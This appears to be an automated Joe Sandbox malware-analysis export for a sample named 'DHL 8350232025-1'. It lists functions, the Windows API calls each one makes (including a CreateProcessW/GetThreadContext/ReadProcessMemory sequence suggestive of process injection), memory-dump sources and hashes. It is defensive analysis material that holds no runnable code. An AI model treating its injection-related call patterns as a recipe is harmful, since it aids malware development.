CreateProcessW.KERNELBASE(?,00000000), ref: 013869AB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01386A41
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01386A63

Memory Dump Source

Source File: 00000000.00000002.1464284078.0000000001384000.00000040.00000020.00020000.00000000.sdmp, Offset: 01384000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1384000_DHL 8350232025-1.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction ID: 039e33dc8ea29abe8893599d7a7d472dd5ef911b78bf8d60769c91a0c118925d
Opcode Fuzzy Hash: b6a4c29ec9195df02a43fc4b15474606dfbde67be6cfae9816a363b0bdbc2b3f
Instruction Fuzzy Hash: B8624C70A14218DBEB24DFA4C851BDEB376EF58304F1091A9D20DEB390E7799E81CB59

Function 001A3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 001E33A2

Part of subcall function 001A6B57: _wcslen.LIBCMT ref: 001A6B6A

Shell_NotifyIconW.SHELL32(00000001,?), ref: 001A3A04

Strings

Line: , xrefs: 001E33EB

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line:
API String ID: 2289894680-1585850449
Opcode ID: 8b9344d19e926b8599737d1e5c5d44fd0fb25df23645bf3656a856eae4820c4b
Instruction ID: 3081397c31a23409b0f50948b9a58e222c51f50d6abff136603d4ac99a090814
Opcode Fuzzy Hash: 8b9344d19e926b8599737d1e5c5d44fd0fb25df23645bf3656a856eae4820c4b
Instruction Fuzzy Hash: DB31E171408300AEC725EB24EC4AFEFB7E8AF52314F00452AF5A993091DB709A99C7C2

Function 001A2DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 001E2C8C

Part of subcall function 001A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,001A3A97,?,?,001A2E7F,?,?,?,00000000), ref: 001A3AC2

Part of subcall function 001A2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 001A2DC4

Strings

`e&, xrefs: 001E2C85
X, xrefs: 001E2C5A

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X$`e&
API String ID: 779396738-1665243713
Opcode ID: 736f8d79ddb98dbe0fbfcafaf78f0f488c96d94bb0799a6483cda2ad940a7554
Instruction ID: 79cace3ec6a2a4e28e19df0850c3dafe022f6f2cc929ca5a78aa1d55e7b99a82
Opcode Fuzzy Hash: 736f8d79ddb98dbe0fbfcafaf78f0f488c96d94bb0799a6483cda2ad940a7554
Instruction Fuzzy Hash: 3621D575A10298AFCB05DF98C809BEE7BFCAF59304F104059E405F7241DBB89A898FA1

Function 001BFDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 001C0668

Part of subcall function 001C32A4: RaiseException.KERNEL32(?,?,?,001C068A,?,00271444,?,?,?,?,?,?,001C068A,001A1129,00268738,001A1129), ref: 001C3304

__CxxThrowException@8.LIBVCRUNTIME ref: 001C0685

Strings

Unknown exception, xrefs: 001C0692

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: 88d096102133d14b3db3ab632160f98b8f1689492c9ca2a48800eb5e6b7e9ec6
Instruction ID: 7fb7e138b25ea8fe2db64a8645f76ba7d81e5099fe59e9e52f5c046d3be721a4
Opcode Fuzzy Hash: 88d096102133d14b3db3ab632160f98b8f1689492c9ca2a48800eb5e6b7e9ec6
Instruction Fuzzy Hash: B2F0C23490020DB7CF05BAA4EC4AE9E7B6C5E34310B60453DF824D6591EF71DA66C6C0

Function 00227F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 002282F5
TerminateProcess.KERNEL32(00000000), ref: 002282FC
FreeLibrary.KERNEL32(?,?,?,?), ref: 002284DD

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 511052352504e20b5dca057a99b25db9a76be68de8a5a0d86ae212d0ca24c4c4
Instruction ID: cfd9b6b3e305a777e02e968afe277baf7e6be346f589f449029d603083fa33eb
Opcode Fuzzy Hash: 511052352504e20b5dca057a99b25db9a76be68de8a5a0d86ae212d0ca24c4c4
Instruction Fuzzy Hash: 19129B71A183519FC724DF68D484B6ABBE1FF89318F04895DE8898B252CB30ED55CF92

Function 001A10F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON

Download Yara Rule

APIs

Part of subcall function 001A1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 001A1BF4
Part of subcall function 001A1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 001A1BFC
Part of subcall function 001A1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 001A1C07
Part of subcall function 001A1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 001A1C12
Part of subcall function 001A1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 001A1C1A
Part of subcall function 001A1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 001A1C22

Part of subcall function 001A1B4A: RegisterWindowMessageW.USER32(00000004,?,001A12C4), ref: 001A1BA2

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 001A136A
OleInitialize.OLE32 ref: 001A1388
CloseHandle.KERNEL32(00000000,00000000), ref: 001E24AB

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: 59b85fc0b55e338478bad81bd4a5ec34d5c9ee7100f9336ecd58e29dcd597198
Instruction ID: d711203ace6a80a1c6cfd4a3f131c1d325d691fca329834e6e6722a52d316763
Opcode Fuzzy Hash: 59b85fc0b55e338478bad81bd4a5ec34d5c9ee7100f9336ecd58e29dcd597198
Instruction Fuzzy Hash: 4871CCB89212018FD388EF7EBC5E6653AE5FF99344794822AD00ED7261EB3044B4CF55

Function 001D86AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,001D85CC,?,00268CC8,0000000C), ref: 001D8704
GetLastError.KERNEL32(?,001D85CC,?,00268CC8,0000000C), ref: 001D870E
__dosmaperr.LIBCMT ref: 001D8739

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 2f36a014587dd34d6100ff2c7e8319a980cdc58b49ba2f8085ed684e11d71fbc
Instruction ID: 04f7f5e00d5647ff91714c0a12b348a0c3daa3d75e53f77f7f1731258e24ebeb
Opcode Fuzzy Hash: 2f36a014587dd34d6100ff2c7e8319a980cdc58b49ba2f8085ed684e11d71fbc
Instruction Fuzzy Hash: DA014E33A0566036D72467386849B7E6B4A9B91774F39015FF8189B3D2DFA0CC818250

Function 001B1310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 001B17F6

Strings

CALL, xrefs: 001B17C6

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 4dca166d6c118f57ff301fd69d1711697f09319c40c3bd6fa931a7edfa2d5c3c
Instruction ID: 440fbbfd9a656943feab8887c2cd12c2f84c9ffd07bca9ff1266fee9ec07014d
Opcode Fuzzy Hash: 4dca166d6c118f57ff301fd69d1711697f09319c40c3bd6fa931a7edfa2d5c3c
Instruction Fuzzy Hash: 3222AD70608201EFC714DF14C8A4BAABBF1BF99314F66891DF58A8B361D771E845CB92

Function 001A3837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 001A3908

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 34403961d263c571cd1abe8d35455a3c1176f887f9865ea09d16a7122e944e0a
Instruction ID: 162a76c01ce763e79baa4f5c78bf026008cd416fc67bd748030b24527b8fcbf4
Opcode Fuzzy Hash: 34403961d263c571cd1abe8d35455a3c1176f887f9865ea09d16a7122e944e0a
Instruction Fuzzy Hash: 7231D5B4504700DFD320DF24E889797BBE8FF49708F00096EF5A983240E775AA54CB52

Function 001A5745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,001A949C,?,00008000), ref: 001A5773
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,001A949C,?,00008000), ref: 001E4052

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7f933a41c66d4feed5ea97580bd10d664e065f86f1c3bbf0ee244c507b11ed61
Instruction ID: 58bd6f79b144098915b0b4539b8a58013bb87eb7b3b7f006b3a080f45fb53f5f
Opcode Fuzzy Hash: 7f933a41c66d4feed5ea97580bd10d664e065f86f1c3bbf0ee244c507b11ed61
Instruction Fuzzy Hash: 2A01B530145725B6E3314A6ADC0EF977F99EF027B0F108311FA9C6A1E0C7B45854DB90

Function 013861ED Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 013869AB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01386A41
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01386A63

Memory Dump Source

Source File: 00000000.00000002.1464284078.0000000001384000.00000040.00000020.00020000.00000000.sdmp, Offset: 01384000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1384000_DHL 8350232025-1.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction ID: 9491e2320ac0504a8ed3f70bfb3fc925c03639b1b76ee3596893fce10170e5dd
Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
Instruction Fuzzy Hash: CD12DF24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F85CF5A

Function 0022709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 1e9ab28bddf269376496be090c68d8867d2c4203a6406f8dde37a390dc8ec3f8
Instruction ID: 924244ae6d8cbadd39c623691896f2fd2a8485166947655483d7069e9e9076ca
Opcode Fuzzy Hash: 1e9ab28bddf269376496be090c68d8867d2c4203a6406f8dde37a390dc8ec3f8
Instruction Fuzzy Hash: B5D15D34A1821AEFCB14EFD8D8819EDBBB5FF58310F144059E905AB291DB70ADA1CF90

Function 001BFC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 001BFD1F

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 52978841e818fcaaeb672ee27020a257a7a8bcf06edcd027e098f68b27d97614
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 1231E475A00109DBC718DF99D880AA9FBA5FF49310B2586A9E809CF656D731EDC2DBC0

Function 001A4ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 001A4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001A4EDD,?,00271418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001A4E9C
Part of subcall function 001A4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001A4EAE
Part of subcall function 001A4E90: FreeLibrary.KERNEL32(00000000,?,?,001A4EDD,?,00271418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001A4EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00271418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001A4EFD

Part of subcall function 001A4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001E3CDE,?,00271418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001A4E62
Part of subcall function 001A4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001A4E74
Part of subcall function 001A4E59: FreeLibrary.KERNEL32(00000000,?,?,001E3CDE,?,00271418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 001A4E87

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 708a8a74720e81128487f10d2a6fbd45c7429ebbbfbc927aff22a2d80e8e80c2
Instruction ID: 593570849f2e5cbc09b2ad10918853453e04f15140d1bd7065c1a61eaf9521c7
Opcode Fuzzy Hash: 708a8a74720e81128487f10d2a6fbd45c7429ebbbfbc927aff22a2d80e8e80c2
Instruction Fuzzy Hash: BA11043A610205ABCB14AB64D806FAD77A59FA1710F20842DF452A71C1EFB4AA049750

Function 001D8402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 001D8440

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 94e66632e157ce3c9e0ff920b25a119db89f4d3769846f676e00edbb29cf0d18
Instruction ID: b731050b0e8f0580d10ac0d4bd448aa01e4b09366b20558c0d6bdaf21670470e
Opcode Fuzzy Hash: 94e66632e157ce3c9e0ff920b25a119db89f4d3769846f676e00edbb29cf0d18
Instruction Fuzzy Hash: 9C11187590410AAFCB05DF58E941A9E7BF5EF48314F11405AF808AB312DB31EA15CBA5

Function 001D5000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001D4C7D: RtlAllocateHeap.NTDLL(00000008,001A1129,00000000,?,001D2E29,00000001,00000364,?,?,?,001CF2DE,001D3863,00271444,?,001BFDF5,?), ref: 001D4CBE

_free.LIBCMT ref: 001D506C

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 0841f1322374887edab72907c38f8fb7a4bf618268009866cecdcdefdc0bd66f
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: 960126722047046BE3218E659881A5AFBEDFB99370F25051EF19483380EB30A805C6B4

Function 001CE602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 810b6e74dae7b9822729633cdaf36e56258f5781598787d21f27f4f9dc198099
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 74F0C832521A2497D7313A799C05F5A33DD9F72335F11072EF425933D2DB74E8028AA5

Function 001A9CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 001A9CBD

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 10c9670d2fbedfdd3de16219deb42da2e1224f8142166eedce00cb261b24ac3f
Instruction ID: c6f12e0c441e29e3a5333d704c9765a5b7685c21b1b4a1ecc6c3e36adf7994db
Opcode Fuzzy Hash: 10c9670d2fbedfdd3de16219deb42da2e1224f8142166eedce00cb261b24ac3f
Instruction Fuzzy Hash: 58F0C8B36007006ED7159F68DC06FA7BB94EB58760F10852EF619CB1D1DB31E554C7A0

Function 001D4C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,001A1129,00000000,?,001D2E29,00000001,00000364,?,?,?,001CF2DE,001D3863,00271444,?,001BFDF5,?), ref: 001D4CBE

Memory Dump Source

Source File: 00000000.00000002.1460899024.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000000.00000002.1460878541.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.000000000023C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460950577.0000000000262000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461008497.000000000026C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1461060622.0000000000274000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1a0000_DHL 8350232025-1.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 924c36d50dc71402c8d330c70576d08fdbc42a4b4ddc7af25e4f919b61478919
